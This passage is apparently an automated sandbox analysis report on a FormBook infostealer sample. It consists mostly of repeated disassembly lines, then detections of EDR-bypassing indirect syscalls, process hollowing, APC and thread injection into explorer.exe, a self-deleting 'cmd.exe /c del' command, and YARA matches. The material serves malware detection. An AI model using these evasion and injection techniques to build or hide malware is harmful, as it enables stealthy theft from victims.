          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C096E mov eax, dword ptr fs:[00000030h]4_2_014C096E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C096E mov edx, dword ptr fs:[00000030h]4_2_014C096E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C096E mov eax, dword ptr fs:[00000030h]4_2_014C096E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A6962 mov eax, dword ptr fs:[00000030h]4_2_014A6962
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A6962 mov eax, dword ptr fs:[00000030h]4_2_014A6962
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A6962 mov eax, dword ptr fs:[00000030h]4_2_014A6962
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01524978 mov eax, dword ptr fs:[00000030h]4_2_01524978
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01524978 mov eax, dword ptr fs:[00000030h]4_2_01524978
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150C97C mov eax, dword ptr fs:[00000030h]4_2_0150C97C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150C912 mov eax, dword ptr fs:[00000030h]4_2_0150C912
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014FE908 mov eax, dword ptr fs:[00000030h]4_2_014FE908
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014FE908 mov eax, dword ptr fs:[00000030h]4_2_014FE908
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01478918 mov eax, dword ptr fs:[00000030h]4_2_01478918
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01478918 mov eax, dword ptr fs:[00000030h]4_2_01478918
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150892A mov eax, dword ptr fs:[00000030h]4_2_0150892A
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0151892B mov eax, dword ptr fs:[00000030h]4_2_0151892B
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0154A9D3 mov eax, dword ptr fs:[00000030h]4_2_0154A9D3
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015169C0 mov eax, dword ptr fs:[00000030h]4_2_015169C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148A9D0 mov eax, dword ptr fs:[00000030h]4_2_0148A9D0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148A9D0 mov eax, dword ptr fs:[00000030h]4_2_0148A9D0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148A9D0 mov eax, dword ptr fs:[00000030h]4_2_0148A9D0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148A9D0 mov eax, dword ptr fs:[00000030h]4_2_0148A9D0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148A9D0 mov eax, dword ptr fs:[00000030h]4_2_0148A9D0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148A9D0 mov eax, dword ptr fs:[00000030h]4_2_0148A9D0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B49D0 mov eax, dword ptr fs:[00000030h]4_2_014B49D0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150E9E0 mov eax, dword ptr fs:[00000030h]4_2_0150E9E0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B29F9 mov eax, dword ptr fs:[00000030h]4_2_014B29F9
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B29F9 mov eax, dword ptr fs:[00000030h]4_2_014B29F9
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015089B3 mov esi, dword ptr fs:[00000030h]4_2_015089B3
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015089B3 mov eax, dword ptr fs:[00000030h]4_2_015089B3
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015089B3 mov eax, dword ptr fs:[00000030h]4_2_015089B3
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014809AD mov eax, dword ptr fs:[00000030h]4_2_014809AD
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014809AD mov eax, dword ptr fs:[00000030h]4_2_014809AD
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h]4_2_014929A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h]4_2_014929A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h]4_2_014929A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h]4_2_014929A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h]4_2_014929A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h]4_2_014929A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h]4_2_014929A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h]4_2_014929A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h]4_2_014929A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h]4_2_014929A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h]4_2_014929A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h]4_2_014929A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h]4_2_014929A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01492840 mov ecx, dword ptr fs:[00000030h]4_2_01492840
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01484859 mov eax, dword ptr fs:[00000030h]4_2_01484859
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01484859 mov eax, dword ptr fs:[00000030h]4_2_01484859
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B0854 mov eax, dword ptr fs:[00000030h]4_2_014B0854
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01516870 mov eax, dword ptr fs:[00000030h]4_2_01516870
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01516870 mov eax, dword ptr fs:[00000030h]4_2_01516870
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150E872 mov eax, dword ptr fs:[00000030h]4_2_0150E872
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150E872 mov eax, dword ptr fs:[00000030h]4_2_0150E872
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150C810 mov eax, dword ptr fs:[00000030h]4_2_0150C810
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152483A mov eax, dword ptr fs:[00000030h]4_2_0152483A
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152483A mov eax, dword ptr fs:[00000030h]4_2_0152483A
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BA830 mov eax, dword ptr fs:[00000030h]4_2_014BA830
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A2835 mov eax, dword ptr fs:[00000030h]4_2_014A2835
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A2835 mov eax, dword ptr fs:[00000030h]4_2_014A2835
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A2835 mov eax, dword ptr fs:[00000030h]4_2_014A2835
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A2835 mov ecx, dword ptr fs:[00000030h]4_2_014A2835
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A2835 mov eax, dword ptr fs:[00000030h]4_2_014A2835
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A2835 mov eax, dword ptr fs:[00000030h]4_2_014A2835
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AE8C0 mov eax, dword ptr fs:[00000030h]4_2_014AE8C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015508C0 mov eax, dword ptr fs:[00000030h]4_2_015508C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0154A8E4 mov eax, dword ptr fs:[00000030h]4_2_0154A8E4
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BC8F9 mov eax, dword ptr fs:[00000030h]4_2_014BC8F9
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BC8F9 mov eax, dword ptr fs:[00000030h]4_2_014BC8F9
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150C89D mov eax, dword ptr fs:[00000030h]4_2_0150C89D
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01480887 mov eax, dword ptr fs:[00000030h]4_2_01480887
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152EB50 mov eax, dword ptr fs:[00000030h]4_2_0152EB50
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01552B57 mov eax, dword ptr fs:[00000030h]4_2_01552B57
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01552B57 mov eax, dword ptr fs:[00000030h]4_2_01552B57
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01552B57 mov eax, dword ptr fs:[00000030h]4_2_01552B57
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01552B57 mov eax, dword ptr fs:[00000030h]4_2_01552B57
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01528B42 mov eax, dword ptr fs:[00000030h]4_2_01528B42
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01516B40 mov eax, dword ptr fs:[00000030h]4_2_01516B40
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01516B40 mov eax, dword ptr fs:[00000030h]4_2_01516B40
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0154AB40 mov eax, dword ptr fs:[00000030h]4_2_0154AB40
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01478B50 mov eax, dword ptr fs:[00000030h]4_2_01478B50
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01534B4B mov eax, dword ptr fs:[00000030h]4_2_01534B4B
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01534B4B mov eax, dword ptr fs:[00000030h]4_2_01534B4B
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147CB7E mov eax, dword ptr fs:[00000030h]4_2_0147CB7E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014FEB1D mov eax, dword ptr fs:[00000030h]4_2_014FEB1D
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014FEB1D mov eax, dword ptr fs:[00000030h]4_2_014FEB1D
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014FEB1D mov eax, dword ptr fs:[00000030h]4_2_014FEB1D
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014FEB1D mov eax, dword ptr fs:[00000030h]4_2_014FEB1D
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014FEB1D mov eax, dword ptr fs:[00000030h]4_2_014FEB1D
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014FEB1D mov eax, dword ptr fs:[00000030h]4_2_014FEB1D
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014FEB1D mov eax, dword ptr fs:[00000030h]4_2_014FEB1D
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014FEB1D mov eax, dword ptr fs:[00000030h]4_2_014FEB1D
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014FEB1D mov eax, dword ptr fs:[00000030h]4_2_014FEB1D
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01554B00 mov eax, dword ptr fs:[00000030h]4_2_01554B00
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AEB20 mov eax, dword ptr fs:[00000030h]4_2_014AEB20
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AEB20 mov eax, dword ptr fs:[00000030h]4_2_014AEB20
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01548B28 mov eax, dword ptr fs:[00000030h]4_2_01548B28
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01548B28 mov eax, dword ptr fs:[00000030h]4_2_01548B28
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A0BCB mov eax, dword ptr fs:[00000030h]4_2_014A0BCB
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A0BCB mov eax, dword ptr fs:[00000030h]4_2_014A0BCB
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A0BCB mov eax, dword ptr fs:[00000030h]4_2_014A0BCB
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152EBD0 mov eax, dword ptr fs:[00000030h]4_2_0152EBD0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01480BCD mov eax, dword ptr fs:[00000030h]4_2_01480BCD
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01480BCD mov eax, dword ptr fs:[00000030h]4_2_01480BCD
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01480BCD mov eax, dword ptr fs:[00000030h]4_2_01480BCD
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150CBF0 mov eax, dword ptr fs:[00000030h]4_2_0150CBF0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AEBFC mov eax, dword ptr fs:[00000030h]4_2_014AEBFC
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01488BF0 mov eax, dword ptr fs:[00000030h]4_2_01488BF0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01488BF0 mov eax, dword ptr fs:[00000030h]4_2_01488BF0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01488BF0 mov eax, dword ptr fs:[00000030h]4_2_01488BF0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01534BB0 mov eax, dword ptr fs:[00000030h]4_2_01534BB0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01534BB0 mov eax, dword ptr fs:[00000030h]4_2_01534BB0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01490BBE mov eax, dword ptr fs:[00000030h]4_2_01490BBE
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01490BBE mov eax, dword ptr fs:[00000030h]4_2_01490BBE
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01490A5B mov eax, dword ptr fs:[00000030h]4_2_01490A5B
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01490A5B mov eax, dword ptr fs:[00000030h]4_2_01490A5B
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01486A50 mov eax, dword ptr fs:[00000030h]4_2_01486A50
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01486A50 mov eax, dword ptr fs:[00000030h]4_2_01486A50
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01486A50 mov eax, dword ptr fs:[00000030h]4_2_01486A50
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01486A50 mov eax, dword ptr fs:[00000030h]4_2_01486A50
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01486A50 mov eax, dword ptr fs:[00000030h]4_2_01486A50
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01486A50 mov eax, dword ptr fs:[00000030h]4_2_01486A50
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01486A50 mov eax, dword ptr fs:[00000030h]4_2_01486A50
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BCA6F mov eax, dword ptr fs:[00000030h]4_2_014BCA6F
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BCA6F mov eax, dword ptr fs:[00000030h]4_2_014BCA6F
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BCA6F mov eax, dword ptr fs:[00000030h]4_2_014BCA6F
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152EA60 mov eax, dword ptr fs:[00000030h]4_2_0152EA60
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014FCA72 mov eax, dword ptr fs:[00000030h]4_2_014FCA72
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014FCA72 mov eax, dword ptr fs:[00000030h]4_2_014FCA72
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150CA11 mov eax, dword ptr fs:[00000030h]4_2_0150CA11
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AEA2E mov eax, dword ptr fs:[00000030h]4_2_014AEA2E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BCA24 mov eax, dword ptr fs:[00000030h]4_2_014BCA24
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BCA38 mov eax, dword ptr fs:[00000030h]4_2_014BCA38
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A4A35 mov eax, dword ptr fs:[00000030h]4_2_014A4A35
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A4A35 mov eax, dword ptr fs:[00000030h]4_2_014A4A35
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014D6ACC mov eax, dword ptr fs:[00000030h]4_2_014D6ACC
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014D6ACC mov eax, dword ptr fs:[00000030h]4_2_014D6ACC
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014D6ACC mov eax, dword ptr fs:[00000030h]4_2_014D6ACC
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01480AD0 mov eax, dword ptr fs:[00000030h]4_2_01480AD0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B4AD0 mov eax, dword ptr fs:[00000030h]4_2_014B4AD0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B4AD0 mov eax, dword ptr fs:[00000030h]4_2_014B4AD0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BAAEE mov eax, dword ptr fs:[00000030h]4_2_014BAAEE
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BAAEE mov eax, dword ptr fs:[00000030h]4_2_014BAAEE
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148EA80 mov eax, dword ptr fs:[00000030h]4_2_0148EA80
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148EA80 mov eax, dword ptr fs:[00000030h]4_2_0148EA80
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148EA80 mov eax, dword ptr fs:[00000030h]4_2_0148EA80
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0016E8B5 GetProcessHeap,HeapAlloc,GetProcessHeap,9_2_0016E8B5
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0016D470 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0016D470
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeNtQueueApcThread: Indirect: 0x18BA4F2Jump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeNtClose: Indirect: 0x18BA56C
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeMemory written: C:\Users\user\Desktop\yaM8XR1HfL.exe base: 170000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeMemory written: C:\Users\user\Desktop\yaM8XR1HfL.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeSection loaded: NULL target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeSection loaded: NULL target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeThread register set: target process: 1028Jump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeThread register set: target process: 1028Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeSection unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 120000Jump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess created: C:\Users\user\Desktop\yaM8XR1HfL.exe "C:\Users\user\Desktop\yaM8XR1HfL.exe"Jump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess created: C:\Users\user\Desktop\yaM8XR1HfL.exe "C:\Users\user\Desktop\yaM8XR1HfL.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\yaM8XR1HfL.exe"Jump to behavior
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B8D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2651644758.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094394902.0000000009B86000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
          Source: explorer.exe, 00000007.00000002.3294750047.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2497456423.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000007.00000002.3294750047.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2497456423.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.3299247758.0000000004B00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000002.3294750047.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2497456423.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000007.00000002.3294750047.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2497456423.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000007.00000000.2496782788.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3292908189.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeQueries volume information: C:\Users\user\Desktop\yaM8XR1HfL.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_00158158 GetCurrentThreadId,GetCurrentThreadId,GetSystemTimeAsFileTime,GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentProcessId,9_2_00158158
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_001A78E0 memset,memset,RtlGetVersion,9_2_001A78E0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
